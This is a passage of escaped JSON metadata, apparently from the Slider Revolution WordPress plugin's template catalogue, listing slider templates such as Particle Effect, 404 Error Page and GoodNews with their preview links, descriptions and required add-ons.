Slider\",\"alias\":\"blurslider\",\"zip\":\"blurslider.zip\",\"uid\":\"83bd6e1ccef83f03c944fa05b0a2d879\",\"img\":\"blurslider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/blur-effect-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=blur-effect-slider\",\"version\":\"1.0.0\",\"required\":\"5.3.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This slider makes use of the brand new blur effects available with version 5.3.1.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change the background images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"124\":{\"id\":\"136\",\"title\":\"Coming Soon Add-On\",\"alias\":\"ComingSoonAddon\",\"zip\":\"ComingSoonAddon.zip\",\"uid\":\"51258492055b940099eb96ba52901fa9\",\"img\":\"ComingSoonAddon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coming-soon-add-on\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coming-soon-add-on\",\"version\":\"1.0.0\",\"required\":\"5.3.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This slider template makes use of the brand new Coming Soon Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-maintenance-addon\\\\\\/revslider-maintenance-addon.php\\\",\\\"name\\\":\\\"Coming Soon & Maintenance AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/revslider-doc\\\\\\/add-coming-soon-maintenance\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"125\":{\"id\":\"137\",\"title\":\"Nice And Clean Package\",\"alias\":\"nice-and-clean-package\",\"zip\":\"\",\"uid\":\"nice-and-clean-package\",\"img\":\"packages\\/templatepack_niceandclean.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/nice-clean-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=nice-clean-responsive-wordpress-theme\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">The Nice & Clean Website Template uses groups & rows for a fully responsive website experience. Elegant blur effects available since version 5.3.1 make this template stand out!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Nice & Clean Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"6\",\"installed\":false},\"126\":{\"id\":\"138\",\"title\":\"Snow Effect Add-On\",\"alias\":\"snowaddon\",\"zip\":\"snowaddon.zip\",\"uid\":\"7408d8567b8af5716eaabd390422e51b\",\"img\":\"snowaddon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/snow-effect-add-on\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=snow-effect-add-on\",\"version\":\"1.0.0\",\"required\":\"5.3.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Add a pleasant Snow Effect to your website with this slider template. Make sure to install the \\\"Holiday Snow\\\" Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"127\":{\"id\":\"139\",\"title\":\"Particle Effect One\",\"alias\":\"particle-effect-one\",\"zip\":\"particle-effect-one.zip\",\"uid\":\"a4611c906e35ca60f617da86217b5299\",\"img\":\"particle-effect-one\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/particle-effect-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=particle-effect-for-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A unique particle effect that can serve as a stunning intro for your website.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \\\"BLEND MODE IMAGE\\\" layer and go to \\\"advanced style -> filters -> blend mode\\\".<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Increase Engagement with Particle Effects and Blend Mode [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-increase-engagement-with-particle-effects-and-blend-mode\\/\",\"guide_img\":\"tutorial\\/particle-effect-one.png\",\"active\":\"1\",\"installed\":false},\"128\":{\"id\":\"140\",\"title\":\"Particle Effect Two\",\"alias\":\"particle-effect-two\",\"zip\":\"particle-effect-two.zip\",\"uid\":\"b8ecbf43374a69e4ab329ea834862ef8\",\"img\":\"particle-effect-two\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/particle-effect-intro\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=particle-effect-intro\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A unique particle effect that can serve as a stunning intro for your website.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"129\":{\"id\":\"141\",\"title\":\"Particle Effect Three\",\"alias\":\"particle-effect-three\",\"zip\":\"particle-effect-three.zip\",\"uid\":\"b33bc2c5655d8d51cd17c3740f72e748\",\"img\":\"particle-effect-three\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/particle-background-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=particle-background-effect\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A unique particle effect that can serve as a stunning intro for your website.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \\\"BLEND IMAGE\\\" layer and go to \\\"advanced style -> filters -> blend mode\\\".<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"130\":{\"id\":\"142\",\"title\":\"Portfolio Viewer\",\"alias\":\"portfolioviewer\",\"zip\":\"portfolioviewer.zip\",\"uid\":\"9ac7230ff5b880fb6c8f28fbbc123b3b\",\"img\":\"portfolioviewer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-portfolio-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-portfolio-plugin\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This slider template can be used to display your portfolio highlights in a stunning way, utilising out free particles add-on and blend modes.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The navigation for the slides is found in the <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">Static Layers<\\/a>.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"131\":{\"id\":\"143\",\"title\":\"App Showcase\",\"alias\":\"appshowcase\",\"zip\":\"appshowcase.zip\",\"uid\":\"082aef931b0369080bc30c3a2a0c331f\",\"img\":\"appshowcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/app-showcase-wordpress-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-showcase-wordpress-plugin\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This template shows off our new \\\"Polyfold Effects\\\" Add-On in form of an App product showcase module. Get started now and illustrate your Apps key features in a striking way!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"132\":{\"id\":\"144\",\"title\":\"Gravity Design Hero\",\"alias\":\"gravitydesign\",\"zip\":\"gravitydesign.zip\",\"uid\":\"7bdbe73a6e5bf290cb4412708ac4134d\",\"img\":\"gravitydesign\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/best-wordpress-slider-plugin-2017\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=best-wordpress-slider-plugin-2017\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This hero template shows a striking mouse-parallax scene and cool particle effects. Requires our \\\"Particle Effects\\\" Add-on to be installed.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Exciting Action Shot for Your Hero Image [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-exciting-action-shot-for-your-hero-image\\/\",\"guide_img\":\"tutorial\\/gravitydesign.png\",\"active\":\"1\",\"installed\":false},\"133\":{\"id\":\"145\",\"title\":\"404 Error Page\",\"alias\":\"404errorpage\",\"zip\":\"404errorpage.zip\",\"uid\":\"2dc62d802b42b73088651cac17d0c486\",\"img\":\"404errorpage\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/404-error-page-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=404-error-page-template\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This template can be used as a custom error page on your website with our new 404 page Add-On. Of course you can also use this template as a regular hero header.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"{\\\"1\\\":{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}}\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"134\":{\"id\":\"146\",\"title\":\"Carousel Gallery\",\"alias\":\"carouselgallery\",\"zip\":\"carouselgallery.zip\",\"uid\":\"041838fd32923c40e15c998f0ea19526\",\"img\":\"carouselgallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-carousel-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-carousel-gallery\",\"version\":\"1.0.0\",\"required\":\"5.4\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This carousel gallery features a subtle parallax effect, html5 video and a fullscreen button.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"135\":{\"id\":\"147\",\"title\":\"Filmstrip Effect\",\"alias\":\"filmstrip\",\"zip\":\"filmstrip.zip\",\"uid\":\"7bd142f272cc15d86998a79520e9e581\",\"img\":\"filmstrip\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/filmstrip-add-on-slider\\/ ?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content= \",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This template uses our Filmstrip Add-On to display a continuous scrolling set of images per slide.\\r\\n There is lots of customization options like animation speed and direction.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-filmstrip-addon\\\\\\/revslider-filmstrip-addon.php\\\",\\\"name\\\":\\\"Background FilmStrip AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"136\":{\"id\":\"148\",\"title\":\"Space Opera\",\"alias\":\"spaceopera\",\"zip\":\"spaceopera.zip\",\"uid\":\"a2c8bffcb138a86c0f373adebb6de046\",\"img\":\"spaceopera\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/space-opera-presentation\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=space-opera-presentation\",\"version\":\"1.0.0\",\"required\":\"5.4\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Space Opera template can be enjoyed as a slow paced, full-screen slider experience and is great to show your most prominent photos.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"137\":{\"id\":\"149\",\"title\":\"Website Intro\",\"alias\":\"websiteintro\",\"zip\":\"websiteintro.zip\",\"uid\":\"348df76d999456aa19be58c9df56ae20\",\"img\":\"websiteintro\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/website-intro-wordpress-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=website-intro-wordpress-slider\",\"version\":\"1.0.0\",\"required\":\"5.4\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Making use of our new Slicey Add-On, this slider show a really cool effect you just have to experience yourself! Just change the slides background images and the existing slices will automatically be applied.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-slicey-addon\\\\\\/revslider-slicey-addon.php\\\",\\\"name\\\":\\\"Background Slicey AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Slider Animation Effect Your Visitors Won\\u2019t Forget [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-slider-animation-effect\\/\",\"guide_img\":\"tutorial\\/websiteintro.png\",\"active\":\"1\",\"installed\":false},\"138\":{\"id\":\"150\",\"title\":\"Mask Showcase\",\"alias\":\"maskshowcase\",\"zip\":\"maskshowcase.zip\",\"uid\":\"fc943c31e2da9c63b252aeabf554d128\",\"img\":\"maskshowcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-mask-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-mask-showcase\",\"version\":\"1.0.0\",\"required\":\"5.4\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Mask Showcase template uses gradients and the amazing block layer animations. A minimal slider treat for any website!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"139\":{\"id\":\"151\",\"title\":\"Parallax Zoom Slices\",\"alias\":\"parallaxzoomslices\",\"zip\":\"parallaxzoomslices.zip\",\"uid\":\"83537cae05709ddb9bcb7375470a5894\",\"img\":\"parallaxzoomslices\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/parallax-zoom-slices-wordpress-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-zoom-slices-wordpress-plugin\",\"version\":\"1.0.0\",\"required\":\"5.4\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This template uses the Slicey Add-On to add a unique effect to slide background images. You can simple change the background images and the slice effect will automatically be applied.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-slicey-addon\\\\\\/revslider-slicey-addon.php\\\",\\\"name\\\":\\\"Background Slicey AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"140\":{\"id\":\"152\",\"title\":\"Double Exposure Effect\",\"alias\":\"doubleexposureeffect\",\"zip\":\"doubleexposureeffect.zip\",\"uid\":\"8d9229b5cbcf5bda5fbdc6a8e01a2b8c\",\"img\":\"doubleexposureeffect\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-double-exposure-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-double-exposure-effect\",\"version\":\"1.0.1\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Make any website special with the double exposure effect slider. Use as a header module or anywhere you want!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"141\":{\"id\":\"153\",\"title\":\"Mountain Parallax Header\",\"alias\":\"mountainparallaxheader\",\"zip\":\"mountainparallaxheader.zip\",\"uid\":\"8dc64663f317a2abdf179bbe341d016e\",\"img\":\"mountainparallaxheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/mountain-wordpress-parallax-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=mountain-wordpress-parallax-header\",\"version\":\"1.0.0\",\"required\":\"5.4.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This template is a cool intro for any page, featuring a striking parallax effect. Just change texts and links and you\'re done!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Place Text Behind Objects in Your Hero Image [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/place-text-behind-objects\\/\",\"guide_img\":\"tutorial\\/mountainparallaxheader.png\",\"active\":\"1\",\"installed\":false},\"142\":{\"id\":\"154\",\"title\":\"GoodNews One-Pager Package\",\"alias\":\"goodnews-one-pager-package\",\"zip\":\"\",\"uid\":\"goodnews-one-pager-package\",\"img\":\"packages\\/templatepack_goodnews_one_pager.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.4.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"slider\",\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"143\":{\"id\":\"155\",\"title\":\"GoodNews Menu\",\"alias\":\"goodnewsmenu\",\"zip\":\"packs\\/goodnewsmenu.zip\",\"uid\":\"4cbc82501ff340fcdc0acf7eb3ba2640\",\"img\":\"goodnewsmenu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/goodnews-responsive-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=goodnews-responsive-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"GoodNews One-Pager\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"7\",\"installed\":false},\"144\":{\"id\":\"156\",\"title\":\"GoodNews 